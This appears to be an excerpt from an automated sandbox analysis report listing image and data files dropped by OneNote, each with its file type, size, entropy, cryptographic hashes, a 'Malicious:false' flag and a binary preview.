                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):27862
                                                                                                                                                                                                              Entropy (8bit):7.238903610770013
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:LTawAZvhbrXzDc6LERLQ/b5vXOl6pXQ/wD5OUMrdRUUhCplQg0ESSz:6wm/vT/b4wxoqbdUhWnSs
                                                                                                                                                                                                              MD5:E62F2908FA5F7189ED8EEBD413928DEE
                                                                                                                                                                                                              SHA1:CA249B4A70924B73BDA52972E9C735AEC35A0C5D
                                                                                                                                                                                                              SHA-256:20ABE389C885E42B6EBE9E902976229BB6FD63C8C34CB61AA70B8B746209F90A
                                                                                                                                                                                                              SHA-512:EE8D1821A918BE8714F431895E7223D08036E88A4FDB9A5485EFF246640EE969A69A8AA4E2E9DDC35BA75FB6D4E95092A286E90B477BD6998C313639C2C31F25
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:18:09......................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................!.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..P.v..+..n(a..Q..S\6....Y....D......} w#.b..]l.5.RU..k...... ]$.$.........f........?.z@2uU...7....?..|.Q..I.&.. ......"T4)wdH.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.472899767434324
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:jSs9yY0IK9UDSMt1jE5zqmlsXoqZ9TP96ohrdqrLnLRXzqNJB39:estBK9UDXDE5PCX39TF6ARy38N
                                                                                                                                                                                                              MD5:6C01D9321DEB932F6364D6F9E16D5724
                                                                                                                                                                                                              SHA1:3DB30AC8B1121E30ECC0D6DAE33E3918F074E2B6
                                                                                                                                                                                                              SHA-256:17B9D0BC83F9F1A86A46F55981792711A9C8FD5DD900B0616502F1960F48AC3B
                                                                                                                                                                                                              SHA-512:AAFFC21132A6B0B36668D1502AFADA8D83B040340812D41B908B2770C50636B212F65C938BE9A947A35E8CD7ACAB299F6AD6FD86E95BDDB46BEF2C64062901F5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......r...v...f...................................................................................................................................2...>...N.......v...............................G.......G..Av^..0...9...I.......I.qk..B.....LZG..Av^..0...9..G....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............~H...n.....kI.P.....N...^................hg.Q.%M..K..=..........f..................................."....I.qk..B.....LZ............~H...n.....kI.P.........~H...n.....kI.P..........G.......G.......G...........................................G..j....G..T.]..G.......G....B..G..H....G....B..G....>.)G....J...................;........4...4...4.."..............G...G...G....z...y.. x.. ...........$........4...*..7*..7........................;........4...4...4.........G.......G......#G..............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 50 x 556, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):977
                                                                                                                                                                                                              Entropy (8bit):7.231269197132181
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:6v/7QiFJaY/z+obuqFA4fypjQSbtBK+lcqNGSbb7XTJArRRzN5DjNRkPmu5cCbR2:x0QY7xbjy9pY0JPXLTWroeuCCbX0
                                                                                                                                                                                                              MD5:B7F74C18002A81A578A4EE60C407A8D3
                                                                                                                                                                                                              SHA1:70A7D4BB1B3ADF4397D168AD0D81B286F88EBDE0
                                                                                                                                                                                                              SHA-256:95F59A0433050180D4C0E8858B83363D51BEA6752A8B7CA516A8677854D8F5B6
                                                                                                                                                                                                              SHA-512:13186A7CDCE80BCA9D2238666D6D7A989FA1887EABFA5D8A9A63EEC304DFD4BE8EFF652205FA56E1D1CEE7D3680AF8C70A952AF73AB3C246400E8D4EBECBDBA9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR...2...,........A....PLTE...................................................................................................................................................................................$.y.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^...0.D_.......cck.....%a...X.a0Y...-..!.G...[....(.r.H.$...1 .zq.4V.e|a.6.X..4..kl.%....=w....6..TN.....{.4..T/.z...../.....3..!~..t.#b..^.....E!.SFb ...-.....^...,..C.!.b...i._c...s.X.w.. lsQH..H.gKc@@...i. ....m...;Ci....@G.; V{..lO..\.R9e$..{.....P...E.+.2.0D.B,..P...56.?......K.6..TN....^z.4..T/.z...../.....3..!~..t.]b........E!.SFb ...-.....^...,..C.!.b...i._c..Y.O...?.9k2.M.?5 .n.P...,...d._..%M?....6....,.1..R.4.a.R.+..U.Q..P...vd..T........j .]@....."..lJ../.90.4...Y. ...9.%...{......Hc%.....i..%M?aG..H....o.q.......4.......X.d9.r..CI.O.5.Ri0?.s\b....w...>/k..4V.)Y....P...vd..T........j .]@....."..lJ../.90..2..MP..l..?....K.X.....IEND.B`.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.236313988258647
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:ssS+lhwsnWSE3TKXonB9zP8RycOlKVCkJ:ssS+l2sW/jKXQB9zP8RycOlKVCk
                                                                                                                                                                                                              MD5:0930FA4473B4235FA3933A7A66CE0E9C
                                                                                                                                                                                                              SHA1:4344DE07E78FB5F3DF75C5A7221CD4798BD34D84
                                                                                                                                                                                                              SHA-256:71F2564399CD6D04DD3F4E1E7C28984764DCE7AF856F35E234B6FD66007E38F1
                                                                                                                                                                                                              SHA-512:F91F3D3790EDA15162EBC9F9C4FBB52DDE029E8381842A5BDCE1C41F8CF4ADF2C8749C908806D07DD8F9F4E022430EAF57570FBE82C4B24C6C7FF14AD0E81187
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ..B.......B./.........t..B./.........t..B..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............A...89..]..B.M.....N...^....................-E...&.K.-........f........................................I.qk..B.....LZ............A...89..]..B.M.........A...89..]..B.M............B.......B.......B...........................................Bj......BT.]....B.......B..B....BH......B..B....B..>.)..B..J...................;........4...4...4.."................B...B...B..z...y.. x.. ...........$........4...*..7*..7........................;........4...4...4...........B.......B....#..B............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):34299
                                                                                                                                                                                                              Entropy (8bit):7.247541176493898
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:BrSX4V3P8AIc4KLkHeXRUer0zrhOmXfvG0yH82I:tSXuIc4K2eBtswKsHg
                                                                                                                                                                                                              MD5:E9C52A7381075E4EBC59296F96C79399
                                                                                                                                                                                                              SHA1:BE295AD24D46E2420D7163642B658BF3234A27EA
                                                                                                                                                                                                              SHA-256:D56CEFE9EE2FAE72E31BDBA7DD2AA4426EA22E3CEB22EF68C8F63F9F24D5A8BC
                                                                                                                                                                                                              SHA-512:95CC96DD4459EBAE623176033BA204CCDC50681A768F8CBAE94C16927D140224E49D5197CAE669C83C77010C5C04C1346CF126BEF49DB686F636C5480342A77F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.......................................................................................!.1..A..Qaq......".#4.2r3.$.%...B.5U&6....Rb.Cs.7..cDTEFVf'...S..dtevw.u.........Gg.....................!1..AQ.aq.2....."#3.4....r..BRb$CS.D............?..5..............#....v.q.m.}\..{....;...r....h.....J..q|..'.;\..6..v......e...../.k..|.8..i..|..]..3e.m....n..Z.GS..n".y..w.-...[a...7A.....i.4.)9\..~C...=.........s..\V]c.D1<./.g.l.&v..~.h..]....zb>G..y:vNS.\......LU....t.{*..Z#.?..v-...wn.rR...P.....y\=.v....../..9_...m4...V.|.+.o.#.......xj....}..>.s.>C...m.[;.>.p...=^.i.X.(..1...{.F#N.W...xi.z...4..u[{...yO.....8..}\..2...KlX.nbya...2.&.F...R.b.k.7.GV.x.h.y\.Q..O<\>......-...=...r......\......Z.Z...Jf.'....z..Y.q>.p....o..K....h..R..c.lg?......A.Z...Y.q3.L|.'5...
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.335535899547569
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:W1sz4vuJaFS8st8Y6cEHSFLrKoWXW/KoW9DsotrdqruiRXDD10t/ZG1:W1sQuY/s2qEyF8Xf9DsURyZZetZG
                                                                                                                                                                                                              MD5:90B38E894F868DA198C19340984EDC7F
                                                                                                                                                                                                              SHA1:872740DF0E457DFE572E675FB088F3C9E7AAD505
                                                                                                                                                                                                              SHA-256:640BA320CBD981C9108335C71F92637C2A22EC0B1D7AE5F37E13EAEF6E683301
                                                                                                                                                                                                              SHA-512:6CE0A90C08A88A1E731F9B2C7763CE2B004483DAC1599B7EC766737920F29EC72AF6D2D7B25C2FA77E31241D9DEA28C19C9B4498D9DD88F87E63E5A25A88BD3F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZO......O..K..?S../.s.O..K..?S../.s.O...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............s...N.7,.4...`....N...^...............n.#1..EJ.h.f...........f........................................I.qk..B.....LZ..............s...N.7,.4...`..........s...N.7,.4...`.........O......O......O..........................................O.j....O.T.]..O......O...B..O.H....O...B..O...>.)O...J...................;........4...4...4.."..............O..O..O...z...y.. x.. ...........$........4...*..7*..7........................;........4...4...4.........O......O.....#O.............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 171 x 552, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):10056
                                                                                                                                                                                                              Entropy (8bit):7.956064700093514
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:edmu1fpj5DVHuooK4EpGLbAdT+dBXYBR8D1V2p6KwoPR6KUX9ojwRpgA:2Pp/B4LbAF+dBo/1E3S6JScpgA
                                                                                                                                                                                                              MD5:E1B57A8851177DD25DC05B50B904656A
                                                                                                                                                                                                              SHA1:96D2E31A325322F2720722973814D2CAED23D546
                                                                                                                                                                                                              SHA-256:2035407A0540E1C4F7934DB08BA4ADD750FCB9A62863DDD9553E7871C81A99E3
                                                                                                                                                                                                              SHA-512:BC7DC1201884E6DAFDC1F9D8E32656BFAEE0BB4905835E09B65299FE2D7C064B27EAA10B531F9BECF970C986E89A5FD8A0B83F508BBA34EB4E38B3F7F5FC623A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR.......(.....!..t....PLTE.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................4.....bKGD....H....cmPPJCmp0712....H.s...#.IDATx^.w`......$..B....... ....fz5..6`l\.8...Nsz{.//y./....{.7}g.....e.....~.......s...f.....%c...6....O.PJ...Y.oi...9..'j.2..6.-
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.3036234385693914
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:usaFAS46rwtEfYWsXGfyWs9DXgRyQ/lIAgJ:usaFAQwKffsXGf9s9DXgRyqlp
                                                                                                                                                                                                              MD5:669DB01CDE2D4A8391D94DCAA253EAB6
                                                                                                                                                                                                              SHA1:DF0AC7EA19CCAED8FBC313B9A5CCEF0ED9A2DD2C
                                                                                                                                                                                                              SHA-256:C4E706E95E5B55F6D0300FF3004E689EC251A9C2E7543C72F188708304A26E75
                                                                                                                                                                                                              SHA-512:FFC915D00CCB7247057F64A6D8A92CED69EDF27B8D0FAB4E3A3395231CB111A5A13167B55CFFF807F14144D9392EC28398B58BA9ACCA3E335CE5EA1ABBD9F5F2
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ.c.......c..z.F.)....._..c..z.F.)....._..c...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............i....V.(...e......N...^................Q[%7E.G.i.].Xd ........f........................................I.qk..B.....LZ.............i....V.(...e...........i....V.(...e............c.......c.......c...........................................c.j.....c.T.]...c.......c...B...c.H.....c...B...c...>.).c...J...................;........4...4...4.."...............c...c...c...z...y.. x.. ...........$........4...*..7*..7........................;........4...4...4..........c.......c.....#.c.............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:11:38], progressive, precision 8, 577x757, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):84097
                                                                                                                                                                                                              Entropy (8bit):7.78862495530604
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:cgHTEuD99rHwA5MSadIV2MApVmfJkAKOQ/Z1I7ngpDDyHfKFVITrU:HHjXidIhApV88/jIEmrU
                                                                                                                                                                                                              MD5:37EED97290E8ECB46A576C84F0810568
                                                                                                                                                                                                              SHA1:18D9FACB4CFA3CBF63B882CABCF30B203EDF4126
                                                                                                                                                                                                              SHA-256:140DD943D0F0CFE6AAA98470B7D1A7CB62CA02CB1D8F522DD2AC77433232EF41
                                                                                                                                                                                                              SHA-512:E0F57314C136211B8253EB2AC0093DED82198E7170D4F97C40D82FD4EC4123D2AAFE3EB4EBC3E7523C4DF4D77619408773871BDE15B6DC6C4049C71D5B9D4222
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H.....hExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:11:38.............................A.......................................................&.(.................................2.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................z.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....b.xH......T..I...S.q.~..../s.R.x.....8.a..vE.5...-.G.A.4...._......$K..d.@NC.q....J.....>e".I.%...I0).R.I$........M3.F .
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.331219532374096
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:ycsBsrBkYspsohUMNXjtJiEMxQXhJ9Dhu6oVrdqrJrJRXedss83spsisrfpsqsYF:ycsBuIqsXj2EbXhJ9D86MRy/vInA7xT
                                                                                                                                                                                                              MD5:A5FE2BDCD0527488DDA07E93CDF5738B
                                                                                                                                                                                                              SHA1:70FEC24D3D3B81F77383B0A91E9C3B42E2DC0E4D
                                                                                                                                                                                                              SHA-256:9ABAEBCE9783CF7A255280BE3E613F196DE759929FA9AD13DBE0C34AD4BA57DF
                                                                                                                                                                                                              SHA-512:2CDEAD3AA41D994289818667F2BF8FA0E51F68F28871CAD51BA86605727EE3D4A320B2935471E4839CEC76BEEB0424004C6D1EF59C5B697B2F7F3E2F9EA7DBE0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......L...v...@...................................................................................................................................2...>...(.......v...t............................I.......I.qk..B.....LZ[@......[@.Wa...n40s.O.[@.Wa...n40s.O.[@...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............T..3...}*....B....N...^.................4Z...E..h.<.^.........f........................................I.qk..B.....LZ.............T..3...}*....B.........T..3...}*....B.........[@......[@......[@..........................................[@.j....[@.T.]..[@......[@..B..[@.H....[@...B..[@...>.)[@...J...................;........4...4...4.."..............[@..[@..[@...z...y.. x.. ...........$........4...*..7*..7........................;........4...4...4.........[@......[@.....#[@.............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:26:15], progressive, precision 8, 216x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):64118
                                                                                                                                                                                                              Entropy (8bit):7.742974333356952
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:ORG4azGOKXzkEmR4bdRSbxONOoz0khbSb4J/5GZK5SWUlRwUYdv1M:ZXzGXzJdhRmgHfIb4J/5GZK5SWUldYdq
                                                                                                                                                                                                              MD5:864EEA0336F8628AE4A1ED46D4406807
                                                                                                                                                                                                              SHA1:CFCD7A751DFDBE52A20C03EE0C60FDFFA7A45B93
                                                                                                                                                                                                              SHA-256:7CE10D1EA660D2F9CF8B704F3FAB2966A4CE2627D9858D32C75D857095012098
                                                                                                                                                                                                              SHA-512:0CAA0C54C14571C279A75F0D5922F78A17803CF6EE1724D66819F7F5944C0F5B25CB586BB686A52808CDF2F8FEB3E4864052A914884054EF7DE44124A8CA951E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:26:15.....................................................................................(.....................&...........s.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................#.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....NC+n....<.=.7..&.8A56..@^.Q..\\...E.>..".&G.......J .'....$.I)........0.../..mv...D....<v0=..ugc+..l.o...=.c.......x.&D..{`8...v
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.356012657470925
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:yBsPm5+o85c/tsIkEp2XT9H5oNrdqrvCB3rRXUt+eFD1AKNREH6:Os2n8a/edEIXT9H5MRyvOE+QBXNREH
                                                                                                                                                                                                              MD5:ECB2C7727EAD63DA88044697B8B3C8DA
                                                                                                                                                                                                              SHA1:2838AC5F5AC5B722A27A33EB235C8EDF7B7B4DB1
                                                                                                                                                                                                              SHA-256:53530F0728ED336B2E9DE634075B80114A96FA39FAF7C5BC979D24BE1812AF74
                                                                                                                                                                                                              SHA-512:FB8BDF80F96F6D842F00B58282198F174A8D8F0DABEC57776C5A12F828677A7DD22ABF50E9B8E1C7E8F09AFF213903CC68123C47D3350DCD4B24D232226442F7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ.E.......E..2gH........k.E..2gH........k.E...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............I/.....:c........N...^................P..e.jN.s.KANB6........f........................................I.qk..B.....LZ.............I/.....:c.............I/.....:c..............E.......E.......E...........................................E.j.....E.T.]...E.......E...B...E.H.....E...B...E...>.).E...J...................;........4...4...4.."...............E...E...E...z...y.. x.. ...........$........4...*..7*..7........................;........4...4...4..........E.......E.....#.E.............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:09:29], progressive, precision 8, 609x675, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):65998
                                                                                                                                                                                                              Entropy (8bit):7.671031449942883
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:klZtmExaFrtWgpc+Sg+DKeplHClpHfRtPMbe:VEWWl+SNDKqlH8p/vse
                                                                                                                                                                                                              MD5:B4F0A040890EE6F61EF8D9E094893C9C
                                                                                                                                                                                                              SHA1:303BCBA1D777B03BFD99CC01A48E0BB493C93E04
                                                                                                                                                                                                              SHA-256:1F81DDE3B42F23F0666D92EBF14D62893B31B39D72C07AEE070EAE28C2E6980E
                                                                                                                                                                                                              SHA-512:8F07E4D519F2FD001006BB34F7F8274B9AF9EC55367B88D41D24E5824FCE4354FD1290CE4735E43930829702ED53F41DF02C673904A7091E9354C28E029AD4EF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:09:29.............................a.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..-O..s(...gO..@...[..+....+...H.'m........L.......@.......[k...S..O..p.'{X..3......]W..w.+.V....[.-.....2..i..i$.p.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8192
                                                                                                                                                                                                              Entropy (8bit):3.2514685083487906
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:CsuquvlOS+WEcQqzXZ49Q9fDqh7IR0vqJPi:CsuquvlOfcJXyG9fa7IR02P
                                                                                                                                                                                                              MD5:8D151DA538F79419BEC8A47DA067ED06
                                                                                                                                                                                                              SHA1:616C594CD05174950267F1A67BC13ACECDDF6CA1
                                                                                                                                                                                                              SHA-256:9FB13D285C7D029280F656FB771D9AA6D220991BBCB90B3D960194BCE6CC967C
                                                                                                                                                                                                              SHA-512:3655020E9F7077B35F330085FDB3A7EAFBE695BF3019025F0062A4F56AB7D64821C09E6F2AE0546E141EA0E60366438B61655EE43E9EB4F35349EF214479899E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...........v.......................................................................................................................................2...>...j.......v................................I.......I.qk..B.....LZ..M.......M..x...........M..x...........M..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............R.`..^...<........N...^................I.`..I..w.5.o.........&...................................>....I.qk..B.....LZ.............R.`..^...<.............R.`..^...<...............M.......M.......M...........................................Mj......MT.a....M.......M..D....MH......M..N....M..?.#..M..9...................;........4...4...4.."................M...M...M..z...y.. x.. ...........$........4...*..7*..7...........Op.b..F.$..i.................;........4...4...4...........M.......M....#..M............................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):32656
                                                                                                                                                                                                              Entropy (8bit):3.9517299510231485
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
                                                                                                                                                                                                              MD5:DD4CA4BC0A73FCB71BEBAA3C29CB8F66
                                                                                                                                                                                                              SHA1:1A7085771D7941540EC94A1BD24D7CC8EA556D4B
                                                                                                                                                                                                              SHA-256:0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
                                                                                                                                                                                                              SHA-512:5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:....l...r...1...*...^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+*@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+*@..$..........?...........?.........@.......................}*E
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12824
                                                                                                                                                                                                              Entropy (8bit):7.974776104184905
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
                                                                                                                                                                                                              MD5:2628353534C5AD86CBFE57B6616D46DD
                                                                                                                                                                                                              SHA1:244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
                                                                                                                                                                                                              SHA-256:69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
                                                                                                                                                                                                              SHA-512:2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
                                                                                                                                                                                                              Malicious:false
